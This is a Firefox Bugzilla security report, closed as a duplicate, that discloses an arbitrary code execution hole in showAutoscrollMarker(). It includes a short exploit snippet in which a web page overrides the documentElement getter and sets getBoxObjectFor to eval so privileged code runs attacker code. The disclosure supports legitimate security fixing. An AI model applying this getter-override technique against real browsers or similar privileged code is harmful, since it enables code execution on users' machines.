Closed Bug 289079 Opened 19 years ago Closed 19 years ago

security hole in showAutoscrollMarker()

Categories

(Firefox :: Security, defect)

x86
Windows XP
defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 289074

People

(Reporter: moz_bug_r_a4, Assigned: caillon)

References

Details

(Whiteboard: [sg:dupe 289074])

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2

Vulnerability: arbitrary code execution

Vulnerable code:
from browser.xml

<method name="showAutoscrollMarker">
  <parameter name="evt"/>
  <body>
    <![CDATA[
      var scrollCursor  = new Array("move", "n-resize", "e-resize");
      var docBox =
this._clientFrameDoc.getBoxObjectFor(this._clientFrameDoc.documentElement);


Exploit:
Web pages can overwrite the getter of documentElement and the getBoxObjectFor
method, such as the following.

  document.__defineGetter__("documentElement", function() {
    return MALICIOUS_CODE;
  });
  document.getBoxObjectFor = eval;

An attacker can exploit *without* user interaction.


I have confirmed that the following testcase works in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Firefox/1.0+


Reproducible: Always

Steps to Reproduce:
Attached file testcase
Status: UNCONFIRMED → NEW
Ever confirmed: true
Blocks: sbb?
Flags: blocking-aviary1.0.3?
Blocks: 289187
Taking this one.
Assignee: dveditz → caillon
Same eval problem as reported in bug 289074.

*** This bug has been marked as a duplicate of 289074 ***

*** This bug has been marked as a duplicate of 289074 ***
No longer blocks: 289187
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 289074]
Flags: blocking-aviary1.0.3?
Group: security
Blocks: sbb+
No longer blocks: sbb?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: